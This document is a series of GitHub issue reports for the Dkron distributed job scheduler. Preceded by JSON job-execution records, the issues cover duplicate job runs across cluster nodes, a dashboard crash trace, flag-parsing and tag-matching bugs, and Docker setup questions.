        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.000726205+01:00",
    "finished_at": "2015-12-21T10:04:20.003752703+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688660000278399,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.07970281+01:00",
    "finished_at": "2015-12-21T10:04:20.084218902+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688660000278399,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.080449838+01:00",
    "finished_at": "2015-12-21T10:04:20.083152242+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTQsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688660000278399,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.001022246+01:00",
    "finished_at": "2015-12-21T10:04:30.006653609+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688670000398125,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.079775433+01:00",
    "finished_at": "2015-12-21T10:04:30.082153846+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688670000398125,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.080502914+01:00",
    "finished_at": "2015-12-21T10:04:30.08370006+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTIsIDAuMTgsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688670000398125,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}]

Same job executed in parallel on all nodes

I faced a problem with job execution and would like to clarify if it's a bug or a feature.

Set up:

After checking out master and running glide install:

$ docker-compose up
Creating dkron_etcd_1
Creating dkron_dkron_seed_1
Creating dkron_dkron_1
Attaching to dkron_etcd_1, dkron_dkron_seed_1, dkron_dkron_1
etcd_1       | [etcd] Mar  4 09:45:41.441 WARNING   | Using the directory dcron1.etcd as the etcd curation directory because a directory was not specified.
etcd_1       | [etcd] Mar  4 09:45:41.443 INFO      | dcron1 is starting a new cluster
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | etcd server [name dcron1, listen on :4001, advertised url http://127.0.0.1:4001]
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | peer server [name dcron1, listen on :7001, advertised url http://127.0.0.1:7001]
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1 starting in peer mode
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'initialized' to 'follower'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'follower' to 'leader'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: leader changed from '' to 'dcron1'.
dkron_seed_1 | Starting Dkron agent...
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: Dkron agent starting"
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: joining: [dkron:8946] replay: true"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=warning msg="agent: error joining: lookup dkron on 8.8.8.8:53: no such host"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Successfully set leader" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"
dkron_1      | Starting Dkron agent...
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Dkron agent starting"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joining: [dkron_seed:8946] replay: true"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joined: 1 nodes"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: The current leader is active" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"

Action:

Then I've published a new job, to run date every 10 seconds:

$ curl -n -XPOST 192.168.99.100:32780/v1/jobs  -H "Content-Type: application/json"    -d '{
  "name": "cron_job",
  "schedule": "*/10 * * * * *",
  "command": "/bin/date"
}'
{"name":"cron_job","schedule":"*/10 * * * * *","command":"/bin/date","owner":"","owner_email":"","run_as_user":"","success_count":0,"error_count":0,"last_success":"0001-01-01T00:00:00Z","last_error":"0001-01-01T00:00:00Z","disabled":false,"tags":null}

Result:

And both nodes started to trigger the job simultaneously:

dkron_seed_1 | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"

And the success counter increased by 2.

Expectation:

Since dkron_seed_1 is the leader, only this node should trigger the job.

I'd assume it's a bug, because sending emails or triggering recurring payments by cron must be unique.

Correct me if I'm wrong.
Thank you.

/cc @Victorcoder

Cron runs on both servers in a cluster

Related to #55 and #62. I have two instances that are in a cluster together. /v1/leader lists one of the two, but both run the script.

$ curl 127.0.0.1:8988/v1/leader
{"Name":"ip-10-100-15-123","Addr":"10.100.15.123","Port":8946,"Tags":{"key":"6dba49e7c1cd0e361fd609f05f10b3af789cb6b5","role":"background_processing","server":"true"},"Status":1,"ProtocolMin":1,"ProtocolMax":2,"ProtocolCur":2,"DelegateMin":2,"DelegateMax":4,"DelegateCur":4}

From CRON_JOB in Consul:

{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.000793897Z",
  "finished_at": "2016-02-18T03:54:00.003708152Z",
  "success": true,
  "node_name": "ip-10-100-15-123",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}
{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.185756608Z",
  "finished_at": "2016-02-18T03:54:00.190238507Z",
  "success": true,
  "node_name": "ip-10-100-15-187",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}

Any ideas? Pinging @whizz on this, since it seems like they've dealt with this. Thanks!

Jobs run :05 or :10 after schedule

I'm still in the early stages of investigating this, but I thought I'd open a ticket in case you had some insight.

We're noticing that most of the time, the jobs run exactly at :00. But once in a while - particularly if the instance is running at least one other thread - it will run at :05 or :10 after. It's never in between; rather, it's always in increments of 5 seconds.

Any idea why this might be, and if there's anything that can be done to alleviate?

(For what it's worth, this is 0.6.3.)

please include linux_arm to builds

Thanks for dkron!

Please add linux_arm to the list of devices you publish releases for. That would be fantastic for me and Raspberry Pi users.

GOOS=linux GOARCH=arm

Dashboard crash

After a while of running, with no immediately apparent reason, the dashboard starts crashing on any request with the following log:

2016-02-25_08:08:29.59255 2016/02/25 09:08:29 http: panic serving 10.9.233.79:64571: runtime error: invalid memory address or nil pointer dereference
2016-02-25_08:08:29.59256 goroutine 24472 [running]:
2016-02-25_08:08:29.59256 net/http.(*conn).serve.func1(0xc820222160, 0x7faffff49240, 0xc820118010)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
2016-02-25_08:08:29.59257 github.com/victorcoder/dkron/dkron.newCommonDashboardData(0xc82010e820, 0xc820162280, 0x16, 0x0, 0x0, 0x0)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:33 +0x55f
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).dashboardIndexHandler(0xc82010e820, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:73 +0x4a7
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.dashboardIndexHandler)-fm(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:43 +0x3e
2016-02-25_08:08:29.59259 net/http.HandlerFunc.ServeHTTP(0xc820229bb0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59259       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82010eaf0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59261       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
2016-02-25_08:08:29.59262 net/http.HandlerFunc.ServeHTTP(0xc820174f90, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59262 github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59263       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:75 +0x1ac
2016-02-25_08:08:29.59263 net/http.HandlerFunc.ServeHTTP(0xc820175080, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59264 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc8202365e0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
2016-02-25_08:08:29.59264 net/http.serverHandler.ServeHTTP(0xc820137c20, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
2016-02-25_08:08:29.59265 net/http.(*conn).serve(0xc820222160)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
2016-02-25_08:08:29.59265 created by net/http.(*Server).Serve
2016-02-25_08:08:29.59267       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

server value from config json is not used

If you specify a "server" option (set to true) in the configuration JSON, it is ignored; only the command line option works. Not sure if it is a bug or a feature, but the docs state that all command line options can be set in the config file.

Notifications

First step is to have email notifications.

Second step webhook configuration to send notifications to.

Commandline option -join does not work when used multiple times

When you specify multiple -join values, the agent will not join a cluster, as the value is wrongly interpreted.

# ./dkron agent -node v-5004.local -bind 0.0.0.0:8946 -http-addr :8080 -backend consul -backend-machine v-211.local:8500 -server -keyspace dkron -encrypt kPpdjphiipNSsjd4QHWbkA== -rpc-port 6868 -tag role=test -join 127.0.0.1:5001 -join 127.0.0.1:5002

INFO[0000] No valid config found: Unsupported Config Type ""
 Applying default values.
Starting Dkron agent...
INFO[2015-12-14T13:37:48+01:00] agent: Dkron agent starting
INFO[2015-12-14T13:37:48+01:00] agent: joining: [127.0.0.1:5001,127.0.0.1:5002] replay: true
WARN[2015-12-14T13:37:48+01:00] agent: error joining: too many colons in address 127.0.0.1:5001,127.0.0.1:5002
INFO[2015-12-14T13:37:48+01:00] api: Running HTTP server                      address=:8080
INFO[2015-12-14T13:37:48+01:00] api: Exiting HTTP server
INFO[2015-12-14T13:37:48+01:00] agent: Listen for events

Pluggable job types

This is an open discussion on how to implement different job types.

Some use cases don't need or don't benefit from shell execution, especially with lots of jobs.

Node failing to join without reason

Hey, I am just getting everything set up. I have things working very well on a single host via docker containers. However, when I attempt to expand that out to other hosts, the agent fails to join and gives no reason. My main docker-compose looks like:

dkron-server-luigi:
  container_name: dkron-server-luigi
  hostname: dkron-server-luigi
  links:
    - dkron-agent-luigi
  ports:
    - "8946:8946/udp"
    - "8946:8946"
    - "6868:6868/udp"
    - "6868:6868"
    - "8080:8080"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -server -backend=etcd -backend-machine=10.100.4.249:4001 -join=10.100.4.155:8946 -debug=true
dkron-agent-luigi:
  container_name: dkron-agent-luigi
  hostname: dkron-agent-luigi
  ports:
    - "8946"
    - "6868"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946
etcd:
  image: microbox/etcd
  ports:
    - "4001:4001"
  volumes:
    - ./etcd.data:/data
  command: -name=dcron1

The above setup works great, but my remote agent docker-compose looks like:

dkron-agent-qcb1:
  container_name: dkron-agent-qcb1
  hostname: dkron-agent-qcb1
  ports:
    - "8946:8946"
    - "8946:8946/udp"
    - "6868:6868"
    - "6868:6868/udp"
  build: ./dkron
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./dkron/config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946

Both are being built from the docker registry image dkron/dkron:latest, and the error message is simply:

dkron-agent-qcb1 | time="2016-04-18T21:14:11Z" level=debug msg="agent: Received event" event=member-join 
dkron-agent-qcb1 | time="2016-04-18T21:14:18Z" level=debug msg="agent: Received event" event=member-failed 

my dkron.json looks like:

{
  "tags": {
    "role": "qcb_docker"
  },
  "keyspace": "dcron"
}

which is basically the same on both hosts.

I have played with all the network settings and cannot seem to find anything wrong; all of my ports are open on all protocols for both hosts. When I query the members, the remote host shows up, but with a status of 4. Here is the response from that:

[{'Addr': '172.17.0.4',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-server-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'key': '8f18334d9e26440bff0f3df9ad7fab6994074f8c',
   'role': 'luigi_docker',
   'server': 'true'}},
 {'Addr': '172.17.0.13',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-qcb1',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 4,
  'Tags': {'role': 'qcb_docker'}},
 {'Addr': '172.17.0.2',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'role': 'luigi_docker'}}]

Does anything catch your eye here?

Security layer

Implement the security layer using the serf key management

Couple questions

Hey, I'm sorry about directing these here, but I'm not sure where else to go. My team and I are looking at implementing this, and we have a couple of questions:

Can you execute commands on remote servers?

When do you all think this will be stable? Are you still seeing bugs in basic executions?

Thanks

List of nodes in dashboard keeps reordering

It's a cosmetic issue. The dashboard homepage (/dashboard) displays a list of nodes at the bottom. It gets live updated. It is probably not sorted though, so it keeps randomly changing the order of the nodes. It's more annoying than anything, so not a huge priority I guess.

Translate node status

Currently the node status in the UI node list is shown as a number.

It would be useful for the user to show the status in plain English.

Run job on one node at a time only?

Hello,

I have a special use case that I'm not sure how to get around it:

Every day our store has thousands of invoices to check and send out; we usually schedule this to run at a specific time of the day. I would love to use dkron to ensure that the cron job does not rely on a single machine to run, but I also have to ensure that it only runs on one single machine (since we should not send invoices twice). I would love the ability to pick the best-fit machine at run time (least resource usage, for example), then run the cron there but not on any other machine.

Job overwrite

Don't overwrite job stats that don't change when a job is updated.

Webhook alert firing on success

Hey, I just got the web hooks going, and they are working, except they are also firing when a job succeeds.

dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Running for election" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Cluster leadership lost" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=debug msg="agent: Stopping scheduler due to lost leadership" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: Received event" event="query: rpc:config" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: RPC Config requested" at=633 node=aws-nv-p-ops-elk payload= query="rpc:config" 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="rpc: Received execution done" group=1461969000000382365 job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Retrieved job from datastore" job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting key" execution=1461969000000899257-aws-nv-p-ops-luigi.valkyrie.net job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting job" job=sched json="{\"name\":\"sched\",\"schedule\":\"0 */5 * * *\",\"command\":\"/home/patrick.barker/.pyenv/versions/anaconda3-2.4.1/bin/python /home/patrick.barker/dkron-python/scriptname/sched.py\",\"owner\":\"\",\"owner_email\":\"[email protected]\",\"run_as_user\":\"\",\"success_count\":1,\"error_count\":0,\"last_success\":\"2016-04-29T22:30:03.423389784Z\",\"last_error\":\"0001-01-01T00:00:00Z\",\"disabled\":false,\"tags\":{\"role\":\"luigi_docker\"}}" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="Webhook call response" body= header=map[X-Ratelimit-Limit:[100] Connection:[keep-alive] X-Ratelimit-Remaining:[100] Location:[https://hipchat.datalogix.com/v2/room/262/history/a0b2f4f5-1b51-40d4-b38b-10cf1e89988a] Access-Control-Allow-Origin:[*] X-Ratelimit-Reset:[1461969307] Server:[nginx] Date:[Fri, 29 Apr 2016 22:30:06 GMT] Content-Type:[text/html] X-Robots-Tag:[noindex, nofollow, nosnippet, noarchive] Strict-Transport-Security:[max-age=31536000]] node=aws-nv-p-ops-elk status="204 No Content" 

The UI shows that the job was a success. Any ideas what could be happening here? Thanks

scheduling mismatch tags with same prefix

I have two servers: one has the role vpnserver and the other vpnserver2. After posting a job targeting the tag vpnserver, both servers got scheduled.

curl 127.0.0.1:8080/v1/members | python -m json.tool
[
    {
        "Addr": "10.0.0.9",
        "DelegateCur": 4,
        "DelegateMax": 4,
        "DelegateMin": 2,
        "Name": "h1",
        "Port": 8946,
        "ProtocolCur": 2,
        "ProtocolMax": 2,
        "ProtocolMin": 1,
        "Status": 1,
        "Tags": {
            "key": "xxx1",
            "role": "vpnserver2",
            "server": "true"
        }
    },
    {
        "Addr": "10.0.0.1",
        "DelegateCur": 4,
        "DelegateMax": 4,
        "DelegateMin": 2,
        "Name": "h2",
        "Port": 8946,
        "ProtocolCur": 2,
        "ProtocolMax": 2,
        "ProtocolMin": 1,
        "Status": 1,
        "Tags": {
            "key": "xxx2",
            "role": "vpnserver",
            "server": "true"
        }
    }
]

curl -n -X POST 127.0.0.1:8080/v1/jobs \
    -H "Content-Type: application/json" \
    -d '{
        "name": "uptime",
        "schedule": "0 30 * * * *",
        "command": "uptime",
        "tags": {
            "role": "vpnserver"
        }
    }'
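
For what it's worth, a minimal Go sketch of the kind of comparison that would explain this behavior (hypothetical illustration, not a claim about dkron's actual tag-matching code): prefix matching treats vpnserver2 as a match for vpnserver, while exact matching does not.

    package main

    import (
        "fmt"
        "strings"
    )

    func main() {
        target := "vpnserver" // tag value requested by the job

        for _, nodeRole := range []string{"vpnserver", "vpnserver2"} {
            // Prefix matching would select both nodes; exact matching selects only one.
            fmt.Printf("node role %-11s prefix-match=%-5v exact-match=%v\n",
                nodeRole, strings.HasPrefix(nodeRole, target), nodeRole == target)
        }
    }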
